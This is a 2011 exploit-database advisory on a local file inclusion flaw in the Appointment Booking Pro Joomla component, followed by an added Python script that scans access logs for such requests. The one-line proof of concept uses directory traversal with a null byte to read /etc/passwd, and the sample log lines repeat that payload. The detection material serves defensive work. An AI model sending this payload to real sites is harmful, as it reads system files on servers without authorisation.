Appointment Booking Pro Joomla Component LFI Vulnerability



EKU-ID: 747 CVE: OSVDB-ID:
Author: Don Tukulesto Published: 2011-07-21 Verified: Verified


Appointment Booking Pro is a native Joomla component
=================================
Last login: Tue Jun  7 2010 10:20:22 on ttys000
                                 ______                                 ___
        ______               ___/  /  /                                /  /
       /  /  /___  ____  ___/__   /  /  ____  ____  _______  ____  ___/  /
   :  /  /  /    \/__  \/  /  /  /    \/    \/    \/  /    \/    \/     /
   | /  /  /  /  /     /  /  /  /  /  /  /  /  /__/  /  /__/  /  /  /  /
 --X-- /  /  /  /  /  /  /  /  /  /  /  /  /  /  /  /__   /   __/  /  /
   |\____/__/__/\____/\____/__/__/__/\____/__/  /__/  /  /\____/\____/
   :                   ____                        \____/:
                      /    \____  ____  ____  ____  ____ |
                     /  /  /    \/    \/    \/    \/   --X--
 Don Tukulesto      /     /  /__/  /__/  /  /  /__/  /__/|
                   /  /  /  /  /  /  /   __/__   /__   / :
                  /__/__/\____/\____/\____/  /  /  /  /
                   www.indonesiancoder.com\____/\____/

Author  : Don Tukulesto (root@indonesiancoder.com)
Homepage : http://indonesiancoder.com
Published : July 17, 2011
Tested On : OS X 10.5.8
=================================


=================================
| Software Info  |
=================================
[>] Vendor      : http://www.appointmentbookingpro.com/
[>] Software    : Appointment Booking Pro - ABPro
       Appointment Booking Pro is an appointment booking or scheduling web site component.
[>] Cost        : $59

I. Proof of Concept
=================================
index.php?option=com_rsappt_pro2&view=../../../etc/passwd%0000

III. Vendor patch
=================================
The vendor does not currently provide a patch or upgrade.
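
With no vendor fix available, one way to look for requests shaped like the proof of concept is to scan web server access logs for `view` values that are not plain identifiers. The following is an added example, not part of the original advisory or the vendor's code; it assumes combined-format access logs and that legitimate view names contain only letters, digits and underscores, and its sample log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

COMPONENT = "com_rsappt_pro2"  # component name taken from the advisory's PoC
SAFE_VIEW = re.compile(r"[A-Za-z0-9_]+")  # assumption: real view names are plain identifiers
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')  # combined log format

def fully_decode(value, max_rounds=3):
    # Percent-decode repeatedly so multiply-encoded values are normalised.
    for _ in range(max_rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def suspicious_view(request_target):
    """Return a reason if the request hits the component with an unsafe view, else None."""
    pairs = parse_qsl(urlsplit(request_target).query, keep_blank_values=True)
    if not any(k == "option" and fully_decode(v) == COMPONENT for k, v in pairs):
        return None
    for key, raw in pairs:
        if key != "view" or not raw:
            continue
        view = fully_decode(raw)
        if "\x00" in view:
            return "null byte in view"
        if ".." in view or "/" in view or "\\" in view:
            return "path traversal in view"
        if not SAFE_VIEW.fullmatch(view):
            return "unexpected characters in view"
    return None

def scan(lines):
    """Return (line_number, reason) for every flagged access-log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        reason = suspicious_view(match.group(1)) if match else None
        if reason:
            hits.append((number, reason))
    return hits

# Constructed sample log lines (documentation IP ranges; "calendar" is a made-up view name).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Jul/2011:10:00:01 +0000] "GET /index.php?option=com_rsappt_pro2&view=calendar HTTP/1.1" 200 5120',
    '198.51.100.7 - - [21/Jul/2011:10:00:05 +0000] "GET /index.php?option=com_rsappt_pro2&view=../../../etc/passwd%0000 HTTP/1.1" 200 1843',
    '198.51.100.7 - - [21/Jul/2011:10:00:09 +0000] "GET /index.php?option=com_rsappt_pro2&view=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 312',
    '192.0.2.10 - - [21/Jul/2011:10:00:12 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 9000',
]
print(scan(SAMPLE_LOG))
```

The same allowlist check on `view` can be applied at a reverse proxy or web application firewall in front of the site to reject such requests before they reach the component.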


=================================

[>] INDONESIAN CODER ~ Server is Down ~ Malang Cyber Crew ~ Magelang Cyber ~ AntiSecurity ~ Exploit-ID
[>] M364TR0N ~ Gonzhack ~ ibl13Z ~ kaMtiEz ~ k4L0ng666 ~ vYc0D ~ Xr0b0t ~ N4ck0 ~ r3m1ck ~ Kidd ~ Jundab
[>] yur4kh4 ~ aN93l1c ~ Arianom ~ Pathloader ~ Contrex ~ Mboys ~ n4KuLa_ ~ m4ho666 ~ jos_ali_joe ~ mengau
[>] kecemplungkalen ~ YaDoY666 ~ Jack- ~ xshadow ~ s4va ~ NoGe ~ kido ~ t3ll0 ~ cimpli ~ Xadal ~ Cyb3r_Tr0n

We are the watchmen, the hackers who quietly observe the scene.
bit.ly/OpIDC

=================================